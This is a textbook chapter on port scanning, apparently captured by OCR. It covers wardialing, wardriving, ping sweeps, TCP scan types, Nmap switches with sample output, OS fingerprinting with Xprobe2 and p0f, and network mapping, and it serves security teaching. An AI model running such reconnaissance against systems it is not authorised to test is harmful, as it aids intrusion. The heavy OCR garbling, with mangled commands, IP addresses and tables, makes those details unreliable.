
• Define common Nmap command switches

• Describe OS fingerprinting

• Detail active fingerprinting

• List differences between active and passive fingerprinting

• List network mapping tools

Determining the Network Range

The tirst step in purl ^nuinlnu is one ol preparation, spec ili cully the yLHJieriny ni inlur-
matlon about the range of Internet protocols (IPs) in use by the target. When identifying
the network range, your ultimate goal is to get a picture of what the range of IP addresses
in use look like together with the appropriate subnet mask in use. With this information
the port scanning process can become much more accurate and effective as only the
IP addresses on the intended victim will be scanned. Not having the cipproprmte network
range can result in an inaccurate or ineffective scan that may even inadvertently set off
dck’t’liv v measures. \V3ien yet liny in form ill ion aboul the network ranges, two options
can be used. With a manual registrar query, you simply go directly to the registration sites

CHAPTER 6 Port Scanning

139

and query for information manually. With an automatic registrar query, you use
Web-based tools. No matter how the range is determined, it is essential that the range
be positively identified before you go any further. Chapter 5 provides a more in depth
explanation of the tools that can be used: Manual Registrar Query (from the Internet
Assigned Numbers Authority, or IANA), Root Zone Database, Whois, and Automatic
Registrar Query

Identifying Active Machines

Once a valid network range has been obtained, the next step is to identify active machines
on the network. There are several ways that this task can be accompli shed, including
the following:

■ Wardialing

• Wardriving

• Pinging

• Port scanning

Each of these methods offers different capabilities useful in detecting active systems and
as such will need to be explored individually. To use each of these techniques the attacker
must clearly understand areas for which they are useful as well as those areas in which
they are weak.

Wardialing

An old but still useful technique is wardialing. Wardialing
is a technique thEit has existed for more than 25 years as a
footprinting tool, which explains why the process involves
the use of modems. Wardialing is very simple: it uses a
modem Lo dial up phone numbers to locale modems. Upon
first look, the technique looks sorely out of place in a world of
broadband and wireless connection technology, but modems
are still widely used due to the low cost of the technology
An attacker who picked a town at random and dialed up a
range of phone numbers in that town would likely turn up
several computers with modems attached, Wardialing can
still be effective even in a world of high-speed connection
technologies.

Dialing a range of phone numbers and getting several modems to respond doesn’t
initially sound significant until what is connected to those modems is considered.
While modems are not nearly as popular as they were several years ago, their presence
is still felt h as modems can be found connected to devices such as public branch exchanges
(PBX), firewalls* routers, fax machines, and a handful of other systems not including

NOTE

Trie name wardialing originated
from the 1983 film WarGames.
In tile film, the protagonist
programmed his computer to dial
phone numbers in a town to locate
a computer system with the game
he was looking for. In the aftermath
of the popularity of the movie, the
name WarGames Dialer was given
to programs designed to do the
same thing. Over time, the name
was shortened to wardialing.

140

PART 2 A Technical Overview of Hacking

actual computers. When you. include more sensitive devices such as routers Bind firewalls,
someone dialing up a modem and attaching to a firewall or router remotely takes on new
significance, A modem can and should be looked at as a viable backdoor into a network,
one that should factor in when planning defensive measures. While there is a long list

of wardialing programs that have heen created over the years,
three well-known wardialing tools include:

■ ToneLoc — A wardialing program that looks for dial tones
by randomly dialing numbers or dialing within a range.
it can also look for a carrier frequency of a modem or fax,
ToneLoc rises an input file that contains the area codes
and number ranges you want it to dial.

• THC-Scart — An older DOS-bcised program that can use
a modem to dial ranges of numbers in search for a carrier
frequency from a modem or fax.

• Phone Sweep — One of the few commercial options
available in the wardialing market

Why is wardialing still successful? One of the biggest reasons is the relative lack of
attention paid to modems by corporations. Modems tend to be thought of as old. low-tech
devices unworthy of serious attention by defenders of a network or attackers. As such,
it is not uncommon to find modems attached to networks that are still active, but forgotten
and un monitored. In some cases, modems have been discovered active and attached to
a company network only after a phone bill was submitted to closer scrutiny, generating
questions Eibout what certain phone numbers are used for.

Ward riving

War driving is another valuable technique for uncovering access points into a network.
Ward riving is the process of locating wireless access points and gaining information about
the conliguration of each. This “snilnng” can be performed with a notebook, a car, and
software designed to record the access points detected. Additionally, a global positioning
system (GPS) can be included to go to the next step of mapping the physical location
of the access points. Don’t get caught up in names, however; ward riving or variations
can be performed with the same equipment while walking, biking, or even Hying.
If an attacker is able to locate even a single unsecured access point, the dangers can
be enormous, as It can give that same attacker quick and easy access to the internal
network of a company. An attacker connecting to an unsecured access point is more
than likely bypassing protective measures such as the corporate firewall, for example.

^ MOTE

Always check local laws before
using any security/hacking tools.
As an example, some states
have laws that make it illegal to
p face a call without the intent to
communicate. In fact, several laws
banning the use of automated
dialing systems used by companies
such as telemarketers were a direct
result of wardialing activities.

CHAPTER 6 Port Scanning

141

But Is It Legal?

It has been debated by black hats and while hats whether the act of wardrivfng is legal
or not. Currently there are no laws specifically making ward riving illegal. However,, using

For example, in the United States a case that is generally cited in the debate is the case
of State v. Allen. In this case r Allen used wardialing techniques in an effort to attach
to Southwestern Bells network in a bid to get free long-distance calling. However, even
though Allen connected to Southwestern Bell’s system, he did not attempt to bypass any
security measure that appeared after the connection was made. In the end r the ruling
was that although a connection was made, access was not.

While there are a multitude of tools u.sed to perform wardriving, other tools,
including the following, Eire useful in defending against these Lit tacks:

Airsnort — Wireless cracking tool

networks. It can notify you as soon as an unapproved machine connects

■ Kismet — Wireless network detector, sniffer, and intrusion detection system
commonly found on Linux

Netstumbler — Wireless network detector: also available for Mac and for handhelds

So why is WEirdriving successful? One of the most common reasons is that employees
install their own access points on the company network without company permission
(known as a rogue access points). An individual who installs an access point in such
a way will more than likely have no knowledge of. or possibly not care about, good security
practices and hy extension leave the access point completely unsecured. Another reason is
that sometimes when an access point has been installed, those performing the installation
have actively decided not to configure any security features, WEirdriving generally preys
upon situations in which security is not considered or is poorly planned. Steps should
be taken to ensure that neither happens.

By definition ward riving is only the process of locating access points in the surveyed area.
In reality, an individual practicing wardriving simply drives through an area, making note of the
types and locations of access points, disregarding services that may be offered. If an attacker
moves toward investigating further (attempting to determine the services that are available),
the attacker is then piggybacking.

(

142 PART 2 A Tech nical Overview of H ack i ng

Ping is a protocol thai is very useful in troubleshooting many network problems and, as Such,
has a useful purpose. In some situations shutting off or blocking ping may actually affect the
network more than the security measure is worth. Astute network administrators are well aware
of the potential danger of leaving ping available, but in many instances they leave it enabled
anyway to make network management easier.

I

NOTE

works, take a moment to
review RFC 792. It can be
found at http:ttwww.faqs
. orgfrfcs/rfc792. h tmL

NOTE

Pinging

A technique that is useful at determining whether a system is
present and active is a ping sweep of an IP address range. By
default, a computer will respond to a ping request with a ping reply
or echo. A ping is actually an Internet Control Message Protocol
(ICMP) message. With the use of a ping, it is possible to identify
active machines and measure the speed at which packets are
moved from one host to another as well as obtain details such
as the Time to Live (TTL).
A key advantage of ICMP scanning is that it can be performed rapidly because it
runs scanning and analysis processes in parallel. In other words, it means more than
one system can be scanned simultaneously: thus it is possible to scan an entire network
rapidly. There are several tools available that can perform ping scans< but three of the
better known ones include Pin gen Friendly Pinger, and WS Ping Pro.

Of course, for every pro there is a con, and pinging in this manner
Ls not without issue. First, it is not uncommon for network adminis-
trators to specifically block ping at the firewall or even turn off ping
completely on host devices. Second, it is a safe bet that any intrusion
detection system I IDS I or intrusion prevention system (IPS) that is in
place will detect and alert network managers in the event a ping sweep
occurs. Finally, ping sweeps have no capability to detect systems that
are plugged into the network but powered down.

Remember, just because a
pmg sweep doesn’t return
any results, it does not
mean that no systems are
available. Ping could be
blocked and/or the systems
pinged may be off.

Port Scanning

The next step to take after discovering active systems is to find out what is available on
the systems: in this case, a technique known as port scanning is used. Port scanning is
designed to probe each port on a system in an effort to determine which ports are open.
It is effective for gaining information about a host because the probes sent toward a system
have the ability to reveal more information than a ping sweep can. A successful port scan
will return results that will give a clear picture of what is running on a system. This is
because ports are bound to applications.

A discussion of port scanning can’t proceed without a clear understanding of some
of the fundamentals of poris. In all, there are 65,535 TCP and 65,5 35 UDP ports on

CHAPTER 6 Port Scanning

TABLE 6-1

Common port numbers.

PORT

SERVICE

PROTOCOL

20/21

FTP

TCP

22

SSH

TCP

23

Te 1 n Gt

TCP

25

SMTP

TCP

S3

DNS

TCP/UDP

SO

i i ^ i r*i

HTTP

TCP

110

POP3

TCP

135

RPC

TCP

161/162

SNMP

UDP

1433/1434

MSSQL

TCP

any given system. Each of these port n urn hers identifies a specilie process that is either
sending or receiving information at any time. At first glance, it might seem thai a security
professional wouid have to memorize all 65.000 plus ports in order to be adequately
prepared, but this is not the case. In reality, only a few ports should ever be committed
to memory, and if a port scan returns any ports that are not immediately recognizable,
those port numbers should be further scrutinized. Some common port numbers are
shown in Table 6-1.

Contained in the list of common port numbers in Table 6-1 is an important detail
located in the last column. In this column, the protocol in use is listed as either TCP or
UDP (the same protocols discussed earlier when reviewing the TCP/IP suite of protocols).
In practice, applications that access the network can do so using either TCP or UDP, based
on how the service is designed. An effective port scan will be designed to take into account
both TCP and UDP as part of the scanning process; these protocols work in different ways.
TCP acknowledges each connection attempt; UDP does not, so it tends to produce less
reliable results.

\i FY I

A complete list of all ports and their assigned services is available at http://www.iana.orgf
assignmen t/port-n umbers . Memorizing all the ports available is not necessary and a pointless
exercise; instead, it is worth knowing several of the common ports and looking up those that
are suspicious or unusual. A good practice is to be able to access the list of ports at a site
such as http://wwwJana.org in case an unfamiliar port appears on a scan.

144 PART 2 A Tech nieal Overview of H atk i n g

TABLE 6-2 TCP fl;

ag types.

FLAG

PURPOSE

SYN

Synchronize sequence number

ACK

Acknowledgement of sequence number

FIN

Final data flag used during the four-step shutdown

RST

Reset bit used to close an abnormal connection

PSH

Push data bit used to signal that data in this packet
should be pushed to the beginning of the queue

URG

Urgent data bit used to signify that there are urgent
control characters in this packet that should have priority

A Closer Look at TCP Port Scanning Techniques

TCP is a protocol that was designed to enable reliable communication, fault tolerance, and
reliable delivery. Each of these attributes allows for a better communication mechEinism.
but tit the same time these features allow an attacker to craft TCP packets designed to gain
information about running applications or services.

To better understand these attacks, a quick overview of fltigs is needed. Flags are bits
L Jial are set in the header of a packet, each describing a specific behavior as shown in
Table 6-2. A penetration tester or attacker with a good knowledge of these flags can use

TCP offers a tremendous capability and flexibility due to flags thai can be set as needed.
E low . L \ it, [ ])[ ] Lhu i > jkh offer iJie same cnpnb-illtics. largely txvause <i\ Ihe nuvlianies ol
the protocol itself. I ID Pea n bethoughtofasa fire-and-forget or best-effort protocol and,
as such, uses none of the flags and offers noneofthe feedback that is provided with TCR
I J DP is harder to scan with successfully; as data is transmitted, there are no mechanisms
designed to deliver feedback to the sender. A failed delivery of a packet from a client to
a server offers only an ICMP message as an indicator of events that have transpired.

One of the mechanisms that port scanning relies on is the use of a feature known as
flags. Flags are used in the TCP protocol to describe the status of a packet and the commu-
nication that goes with it. For example a packet flagged with the FIN flag signals the end
or clearing of a connection. The ACK flag is a signal used to indicate that a connection has
been acknowledged. An XMAS scan is a packet that has all its flags active at once, in effect
“lit up” like a XM AS tree.

Some of the more popular scans designed for TCP port scanning include:

• TCP connect scan — This type of scan is the most reliable but also the easiest to detect.
This attack can be easily logged and detected because a full connection is established.
Open ports reply with a SYN/ACK while closed ports respond with a RST/ ACK.

6

CHAPTER 6 Port Scanning

TCP SVN scan — This type of scan is commonly referred to as half open because a full
TCP connection is not established. This type of scan was originally developed to be
stealthy and evade IDS systems, although most modern systems have adapted to detect
it. Open ports reply with a SYN7ACK while closed ports respond with a RST/ACK.

TCP FIN scan — This scan attempts to detect a port by sending a request to close
a nonexistent connection. This type of attack is enacted by sending a FIN packet to
a target port: if the port responds with a RST, it signals a closed porL This technique
is usually effective only on UNIX devices,

TCP NULL scan — This attack is designed to send packets with no flags set, The goal
is to elicit a response from a system to see how it responds and then use the results
to determine the ports that are open and closed.

• TCP AC K scan — This scan attempts to determine access control list (ACL) rule sets
or identify if stateless inspection is being used. If an ICMP destination is unreachable,
the port is considered to be filtered.

TCP XMAS tree scan — This scan functions by sending packets to a target port with
flags set in combinations that are illegal or illogical. The results are then monitored
to see how a system responds. Closed ports should return an RST,

/ \

Detecting Half-Open Connections

Half-open connections can still be detected, but less easily than full-open scans. One way to detect
half -open connections on Windows is to run the following command followed by the results:
netstat -n -p TCP

PROTOCOL

STATE

TCP

10.150.0

237.177.154.8:25882

Established

TCP

io.iso.q

.200:21

236.15, 133,204:2577

Establi shed

TCP

ie.i5i.ia

.200:21

127.160. 6. 129:51748

Establi shed

TCP

10.150.fl

.200:21

236.220.13,25:47395

Established

TCP

le.ise.a

,200:21

227,200,204.182:60427

Established

TCP

ie.ise.ta

.200:21

232.115. 18,38:278

Established

TCP

ie.ise.ia

.200:21

229.116.95,96:5122

Established

TCP

ie.ise.ia

.200:21

236.219.139.207:49162

Establi shed

TCP

io. iso. a

.200:21

238.100.72,228:37899

Established

The connections have- specifically been labeled with the text SYN_RECV # which indicates a half-open
connection. Running this command in practice would be impractical, but the example does show
that it is possible to detect ha If -open connections.

146 PART 2 A Technical Overview of Hacking

Port Scanning Countermeasures

Port scanning is a very effective tool for an ethical hacker or attacker, and proper
co u nte rm e as u res should be deployed. These counter measures include the range of
techniques utilized by an organization’s IT security group to detect and prevent successful
port scanning from occurring. As there are a number of techniques that can he used
to thwart port scanning, it would be impossible to cover them all, but listed here are some
co u nte rm e as u res that prevent an attacker from acquiring information via a port scan:

Deny all — Designed to block all traffic to all ports unless such iratlic has been
explicitly approved

• Proper design — A careful and well-planned network that includes security
measures such as IDSs and firewalls

• Firewall testing — Scanning a firewall is used to verify its capability to detect
and block undesirable traffic,

Port scanning — Utilizes the same tools that an attacker will use to Eittack a system
with the goal of gaining a better understanding of the methods involved

Security awareness training — An organization should strive to provide a level
of security awareness within the organization. With proper seeurily awareness
in place, personnel will know how to look for certain behaviors and maintain
security. Security awareness will also be used to verify security policies and practices
are being followed and to determine whether adjustments need to be made.

Mapping Open Ports

With scanning completed and information obtained, the next step of mapping the
network can be performed. An attack in this stage has moved into a more interactive
and aggressive format. There are many tools available that can be used to map open ports
and identify services on a network. Because every tool cannot be covered, it is necessary
to limit the discussion to those tools that are widely used and well known, No matter
which tools are to be used, however, the activity here can be boiled down to determining
whether a target Is live and then port scanning the target.

Nmap

Nmap is one of the most widely used security tools and a firm understanding of Nmap
is considered a requirement for security professionals. At its core, Nmap Is a port scanner
that has the ability to perform a number of different scan types. The scanner is freely
available for several operating systems, including Windows, Linux. MacOS, and others.
By design h the software runs as a command line application, but to make usage easier*
ci graphical user interface (GUI) is available through which the scan can be configured.
The strength of Nmap is that it has numerous command line switches to tailor the scan
to return the desired information, The most common command switches are listed in
Table 6-3.

CHAPTER 6 Port Scanning

table 6-3 Nmap options.

MMAP COMMAND

SCAN PERFORMED

-sT

TCP connect scan

-sS

SYN scan

FIN scan

-sX

XMAS tree scan

-sN

NULL scan

-sP

Pino sea n

-sU

UDP scan

-sO

Protocol scan

-sA

ACK scan

-sW

Windows scan

-sR

RPC scan

-sL

List/DNS scan

-si

Idle scan

-Po

Don’t pinq

w-r w i i i_ |_r i i i «y

-PT

TCP ninn

■ n— ■ i_r i i i u

-PS

SYN Dina

_r 1 ■ V B— r ■ 1 1 h_gl

-PI

It” MP oina

-PB

TCP and (CM P ping ]

-PB

ICMP ti mestannD

■ llrll L 1 1 I 1 ^ “L.^J III

-PM

-oN

Normal out out

-oX

XML outout

-oG

Greooable outout

-oA

All OUtDUt

J L ■ ■ n_r 1—1 LLr ■_

-T Paranoid

I 1 U J 1— 1 1 1 1_f 1 ■— H

r S 1 3 1—1 I F S U 1 1 j r l_r l_r _F H h_ l_r S_ l_ ■ r H_ ■ 1 1 JhuU 1 1 J

-T Sneaky

Serial scan; 15 sec between scans

-T PoSite

Serial scan; .4 sec between scans

-T Normal

Parallel scan

-T Aggressive

Parallel scan

-T Insane

Parallel scan

148 PART 2 A Technical Overview of Hacking

To perform an Nmap scan, at the Windows command prompt, type Nmup IP address,
followed by the switches that are needed to perform the scan desired. For example,
to scan the host with the IP address 1 92.1 68. 123.254 using a full TCP connecting
scan type, enter the following at the command line:

Nmap -sT 92. 168. 123.254

TJk i response will be similar to this:

Starting Nmap 4.62 (http://nmap.org) at 2010-03-21 10:37 Central
Daylight Tine

Interesting ports on 192 . 168. 123 . 1 54 :

Not shown: 1711 filtered ports

PORT STATE SERVICE

21/tcp open ftp

S0/tcp open http

2601/tcp open zebra

2602/tcp open ripd

Nmap done; 1 IP address (1 host up) scanned in 113.750 seconds

These results are providing information about the victim system, specifically the ports
that are open and ready to accept connections. Additionally, since the scan was performed
against a system on the local network, it also displays the media access control I MAC)
address of the system being scanned. The port information can be used later to obtain

N map’s results can display the status of the port in one of three states:

• Open — The target device is accepting connections on the port.

• Closed — A closed port is not listening or accepting connections,

» Filtered — A firewall, filter, or other network device is monitoring the port and
preventing full probing to determining its status.

H FYI i

One of the more common types of scan is a full TCP connection scan £-sT) because it completes
all three steps of the TCP handshake. While a full connect scan is the most common, a stealth
scan is seen as more covert because only two steps of the three-step handshake are performed.
One of the techniques to perform a somewhat stealthy scan is a SYN scan which only performs
the first two steps. This type of scan is also known as ” half open” scanning as it does not
complete the connection.

CHAPTER 6 Port Scanning

149

5ci | HwJ and5tiwc« DtKOvCfj^ | 5ci0p*iora | Tods | Wnfcws E numefotion | About |

IPr

HoUfumAP |-.*216S.1212:-:
Start IF X|| m 163 . 123
ErteilP X]| 142 . Itt .123 254

SlallP ErKil?

Do* At

H*f ciuat : EU&knov&l

TCP jwira IS) 21,60, SIS

Tccal JLi-V* hosts nc<jv^nr»d
TotB.1 op
n. TCP ports
tbt*i ap«n MPT per**

i

i

2

PcxtocmlTi? honniu Earalisticn. .
V«i forainv Finnic grab*. . .

TCP bimwi grabbing 13 porifl
bkrtmi grabbing 12 por**l
Alport mg 5 run iifulti…
S<*n dmi

Dieevry f ia&ifctd:

limn iii»iJiiii|iiiiii|t|||||tit|||||tllllllllllllllll1lfl«ltlfltI»iiiililiilti

Lava: 1

TCP od«i: 3 JDP open: 2 1/1 dona

FIGURE 6-1

Superscan.

Superscan

Superscan is a Windows-based port scanner developed by Foil tut stone. This port scanner
is designed to scan TCP and UDP ports, perform ping scans, run Whois queries, and use
tracert. Superscan is a GUI-based tool that has a prec on figured list of ports to scan or
can be customised Lo scan a specific range. It’s shown in Figure 6-1,

Scanrand

[ ; NOTE

Scanrand is a scanning tool that is designed to scan a single host up to
large-scale networks quickly and then return results about the network.
Scanrand is unique among network scanners because although most scan
a port at a time, Scanrand scans ports in parallel using what is known as
stateless scanning. By using stateless scanning, Scanrand can perform
scans much faster than other network scanners.

St Lite less scanning is an app roach to scanning I hat splits scanning into two distinct
processes. The two processes work together to complete the scanning process with one
process transmitted and the other listening for results. Specifically, the first process transmits
connection requests at a high rate, and the second process is responsible for sorting out
the results, The power of this program is a process known as inverse SYK cookies,

Scanrand is available
for both the tinux
and UNIX platforms;
there is no Windows
equivalent.

150 P A RT 2 A Tech n i ca I Overview of H ack i ng

Scanrand builds a hashed sequence number that isphiced in the outgoing packet that can
be identified upon return. This value contains information that identifies source IP, source
port, destination IB and destination port Scanrand is useful to a security professional
when a Large number of IP addresses need to be scanned quickly,

THC-Amap

THC-Amap (Another Mapper) is a scanner that offers a different
approach to scanning. When using traditional scanning programs,
problems arise when services thai use encryption are scanned,
because these services might no! return a banner, due to the fact
that certain services such as the Secure Sockets Layer (SSL) expect
a handshake, Amap handles this by storing a collection of normal
responses that can be provided to ports to elicit a response. The tool
also excels at allowing the security professional to find services
that have been redirected from standard ports.

OS Fingerprinting

Open ports that have been uncovered during the port scanning phase need to be further
investigated because the mere existence of an open port does not mean vulnerability
exists; this must still be determined. The open ports that are discovered provide clues
to what operating system is in use on the target. Determining the operating system
that is in use on a specific target is the purpose of what is known as OS fingerprinting.
Once an operating system is identified L it is possible to better focus the attacks that
come later, To identify an OS. there are two different methods that can be utilized:
active fingerprinting or passive fingerprinting,

OS linger printing relies on the unique ebaracierisl ics 1 bin each OS possesses lo
function. Each operating system responds to communication tit tempts in different ways
that, once analyzed, can allow for a well-educated guess to be made about the system
in place. To seek out these unique characteristics, active and passive fingerprinting can
probe a system to generate a response or listen to a system’s communications for details
tihoul the OS.

H ™ ■ ;

There are literally untold numbers of techniques available to use in an attack. In some cases,
these techniques are specific to an operating system due to the vulnerability involved such as
a design flaw in the OS or a software defect. When an attack is meant to be used against
a specific OS, it would be pointless to unleash it against a target that is not vulnerable, which
would both waste time and risk detection.

NOTE

THC-Amap is similar to Nmap
in that it can identify a service
that is fistening on a given port.
Amap does not include the
extensive identification abilities
possessed by Nmap,, but it can
be used to confirm results of
Nmap or to fill in any gaps.

CHAPTER 6 Port Scanning

Everything Has a Price

Active OS fingerprinting has advantages that make it an attractive option, at least on
the surface. The process generally does not take as long to identify a target because
the attacker requests information instead of waiting for it, as in passive fingerprinting.
While performance is a benefit, the downside is that the process of active fingerprinting
has a much higher chance of revealing the attack. It is more than likely that the process
of active fingerprinting will trigger defensive counter measures such as IDS and firewalls,
which will respond by alerting the network owners about the attack and shutting it down.

Does this mean active fingerprinting is a bad idea? Not necessarily — there is a time and
place for it, and knowing when to use active methods and how aggressively to use them
is important. Active fingerprinting, for example, is an ideal mechanism to scan a large
amount of hosts quickly, but the danger of being detected and stopped still exists.

Active 05 Fingerprinting

The process of active OS fingerprinting is accomplished by sending specially crafted
packets to the targeted system. In practice, sever til probes or triggers Eire sent from the
scanning system to the target. When the responses are received from a targeted system,
based on the responses Ein educated guess can be made as to the OS that is present.
Though Li may uppcnr otherwise. OS identification is tin iKViiraic 1 mcLtnn’ ul” detmuming
the system in pi Lice because the tools have become much more accurate lhan in the past.

Xprobe2

Xprobe2, a commonly used active fingerprinting tooL relies on a unique method to identify an
operating system known as fuzzy signature matching. This method consists of performing a
series of tests against a certain target and collecting the results. The results are then analyzed
to a probability thcit a system is running a specific OS. X pro be 2 cannot say definitively which
operating system is running, but instead uses the results to infer what system is running.
As an example, running Xprobe2 against a targeted system yields the following results:

75% Windows 7
20% Windows XP
5% Windows 3B

The results that Xprohe2 is presenting here are the probability that the system is running
a given OS. Xprobel comes with several predefined profiles for different 0$S t and the results are compared against these profiles to generate the results seen here. The results show that (here are three fXSs that match profiles to different degrees: The results for Windows 7 are at 75 percent and the others are quite low, so it can be assumed with some confidence that Windows 7 is in place. This score is intended to determine which operating system the target computer is running. 152 PART 2 A Technical Overview of Hacking Which Method Is Better? Nmap can be used with or without a GUI, and ii is up to the individual users to determine which is best for their own particular style. For those who are not comfortable with the command line, the GUI is a great way to learn and get acquainted with what the command line switches look like for specific operations. The Zen map GUI is a front end for Nmap that makes the product easier to use while allowing the operator to see what the command line looks like. Consider using Zenmap to start; then use the command line once a comfort level is achieved with the commands. Nmap Valuable in OS fingerprinting as well as port scanning. Mm tip can provide reliable data on which operating system is present. Nmap is effective at identifying the OKs of networked devices and generally can provide results that are highly accurate. Several Nmap options that can be used to fine-tune the scan include: • -sV Application version detection • -O OS fingerprinting • -A Both of the previous options An example of an Nmap scan with the -O option is shown here: Nmap -0 192. 168. 123.254 Starting Nmap 4.62 (http://nmap.org) at 2010 -03- 2 1 12:09 Central Daylight Time Interesting ports on 192. 168. 123 . 22: Not shown: 1712 closed ports PORT STATE SERVICE SO/tcp open http 2601/tcp open zebra 2602/tcp open ripti MAC Address: 0©: 16 :01 :D1 :3D:5C (Netgear) Device type: general purpose Running: Linux 2.4.X OS details: Linux 2.4 , 1S-2 .4.32 (likely RedHat) Uptime: 77.422 days (since Sun Jan §3 01:01:46 2010) Network Distance: 1 hop CHAPTER 6 Port Scanning Nmap has identified this system as Linux along with version and up lime information. An attacker gaining this information can now target an attack to make it more effective because it would be possible to focus on only those exploits that are appropriate — for example, no Windows attacks, Nmap is capable of identifying commonly encountered network devices and is a tool that should not be overlooked. Passive OS Fingerprinting The alternative to active fingerprinting is passive fingerprinting, which approaches the process differently. Passive fingerprinting, by design, does not interact with the target system itself, It is a passive tool that monitors or captures network traffic. The traffic monitored is analyzed for patterns that would suggest which operating systems are in use. Passive OS fingerprinting tools simply sniff network traffic and then match that traffic to specific OS signatures. The database of known patterns can be updated from time to time as new operating systems are released and updated. As an example* a tool may have a jinger print for Windows Vista but will need to be updated to include Windows 7. A passive identification requires larger amounts of traffic, but offers a level of stealth, as it is much harder to detect these tools, since they do not perform any action that would reveal their presence. These tools are similar in that they examine specific types of information found In IP and TCP headers. While you do not need to understand the inner workings of TCP/IP to use these tools, you should have a basic understanding as to what areas of these headers these tools examine. These include; • TTL Value • Don’t Fragment Bit (DF) ■ Type of Service (TOS) • Window Size The pOf Tool A tool for performing passive OS linger printing is a tool named p£]f, which can identify an OS using passive techniques. That means pOf can identify the target without placing any additional traffic on the network that can lead to detection. The tool makes attempts to fingerprint the system based on the incoming connections that are attempted. Patience Is a Virtue While passive OS fingerprinting generally does not yield results as quickly as active OS fingerprinting, there are still benefits. Passive OS fingerprinting allows an attacker to obtain information about a target without triggering network defensive measures such as IDS or firewalls. While the process may take longer than .active fingerprinting, the benefit is that the victim has less chance of detecting and reacting to the impending attack. Remember: Active fingerprinting contacts the host; passive fingerprinting does not. 154 PART 2 A Technical Overview of Hacking Are We There Yet? The results of the scanning process shown here can be misleading because it is possible that pOf will not be able to identify a system for a number of different reasons, tn such events, pOf will return results that will state “unknown” for the operating system instead of an actual OS. In these cases, it may be necessary to try another passive tool or switch to active methods to determine the OS. The following results have been generated using pOi: C:\>p0f -il pOf -passive os fingerprinting utility, version 3.0.4 (C) M . Zalewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com> WIN32 port (C) M. Davis <mike@datanerds.net>, K. Kuehl <kkuehl@cisco . com> p0f: listening (SYN) on p \Device\NPF_;Ml34627-43B7-4FE5-AF9B – l8CDa40ADW7E} 1 f 11 2 sigs (12 generic), rule: ‘all’. 1. 123.254: 1045-Linjx RedHat Once pOf is running, it will attempt to identify the system that is being connected to. based on the traffic that it observes. The previous example shows that pOf has identified the system in question as being a distribution of Linux known as RedHat. NOTE The tools in this category were designed to help those who create networks manage them. However, as with most tools, the possibility for abuse exists. As is true in most cases, the tool isn’t evil or bad; it’s the intention of the user that actually determines whether honorable or tess-than- honorable actions will be the result. Mapping the Network The next step in the process is to generate a picture of the network that is being targeted. When the information has been collected and organized, a network diagram can be produced that will show vulnerable or potentially vulnerable devices on the target network. A number of network management tools can produce an accurate map of the network built of information that has been gathered previ- ously in addition to new information. Some tools that can help in the process include SolarWinds Toolset, Cheops, Queso, and Harris Stat. CHAPTER 6 Port Scanning 155 Even without these tools, you should be able to manually map your li ridings. This information can be recorded in a notebook or a simple spreadsheet. This spreadsheet should contain domain name information, il’ addresses, domain name system (DNS) servers, open ports, OK version, publicly available IP address ranges, wireless access points, modem lines, and application banner details you may have discovered, Cheops Cheops is an open source network management tool lhat can assist in viewing the network layout and the devices therein. Cheops can assist an attacker in the same way it would assist a network admin — it performs tasks such as identifying hosts on a network and the services each offers. Even more useful is the ability to display the whole network in a graphic format showing the paths of data between systems on the target network, Solarwinds Solarwinds is another network management tool that can be used to render a diagram of a network and the services within. Solarwinds has the ability to detect, diagram, and reflect changes in the network architecture with a few button clicks. It is even possible for Solarwinds to generate network maps that can be viewed in products such as Microsoft’s diagramming product Visio. Analyzing the Results With a wealth of data on hand, the attacker now must undertake the process of analyzing that data to learn more about the target. Understanding the vulnerabilities of the i T ictim and identifying potential points of entry require careful analysis and organization. At this point, the attacker starts to plan the attack. When analyzing data, for example, items such as an open wireless access point can lead a hacker to consider additional ward riving or wireless attack activities in an attempt to connect to the network. Another example is an unpatched Web server that would present the hacker an opportunity to run an attack against the server itself. Generally, these steps would be the following: • Analyze the services that have been revealed, • Explore vulnerabilities for each service or system. • Research and locale any potential exploits that can be used to attack the system. • Once each of these items has been completed, the attacker can now use a search engine lo gather inform til Ion ahoul pou-nllaJ attacks h\ searching Lhe OS and exploits. Plenty of information is available for an attacker to learn how to position an attack, One example, http://www.securitiffocus.com. was searched for vulnerabilities for Windows Web server IIS version 5. The results are shown in Figure 6-2. Notice that there are more than three pages of results. 156 PART 2 A Technical Overview of Hacking VUlner-aEdities (Pag* J cf 3) t 2 3 Mast > Vendor MfcSGSon * Title: IIS VerttioriJ SO u Search by CV£ CSEs ■ ii’rinrni rr i inniirr’ – – ■ ■ ■-■ ■ ■ ■ ■ ■ ■ ——– . … . . ■ r . . . – P . nBBrln ^ – , , Tr mirr- i-> nr » iiirniin’7rii”ii”!iirm’r!i”ininiTi ■ frniii RETIRED: Microsoft EI B Walt pniicd Local Filename Security Bypass Vuhicrabilty Microsoft IIS FTPrJ ML ST Rerhofcc Buffer 1 Overflow Vuhterabil ity http://w«w wcL’itv f ocus com/bd/’36 1 89 Microsoft IIS FTPrl blobbing Functionality Remote Dcsninl of Service ViJnernhaity RETIRED! Microsoft IISFTPd Globbing Funciioiidlity RtinuLt; Dental of St:rvk*5 VulnerabilitV Microsoft Coifiboratkni Da La objects Remote UuEfer Overflow Vdnerabilitv http-: //www. j*c^tyfe>CLis.coiTi 1 /bdl/ 1 5067 Microsoft Xffl. Parser Remote Dental of Service vulnerability 20M-07-JS bttp : //vrtww.aeojitvfoojs.com.i’btd/L 1 3S4 FIGURE 6-2 Microsoft IIS vulnerabilities, It is Ett this point that the reasons for patiently and thoroughly collecting information about a target become clear. With the results of previous scans, maps, and other data gathered, a target can be more accurately pinpointed resulting in a more effective and potentially devastating attack. CHAPTER 6 Port Scanning CHAPTER SUMMARY This chapter introduced the concept of port scanning, Port scanning is a technique that is used to identify services present on a system or range of systems. The purpose of port scanning is to get a better idea of what is present and running on a target prior to carrying out an actual attack against a system. In order to learn more about the services that are available on a system, several techniques can be used, including wardrning. wardialing, and piny sweeps. Once services have been identified and eon firm ed> the next step is to learn about the operating system to better target the attack it sell’ To get the best results from an attack, the operating system needs to be known. There are two ways to determine the OS: active and passive fingerprinting, Active lingerprinting iden lilies a system or range of systems by sending specially cral’ted packets designed to reveal unique characteristics aboul the target .The downside of this type of lingerprinting is that the process can be easily detected. Active lingerprinting tools include Nmap and Xprobe2. The alternative to active lingerprinting is passive iinytTpriniing, which is sleaUhier. but is not as accurate. One of the best passive fingerprinting tools is pOf. The attacker will then move on to mapping the network to determine the nature and relationship of I he hosts on the network. Network mapping reveals the nature and relationship of the network in a graphical format, allowing lor a better view of the network. Network mapping is one of the last steps before choosing an attack. Once applications have been mapped 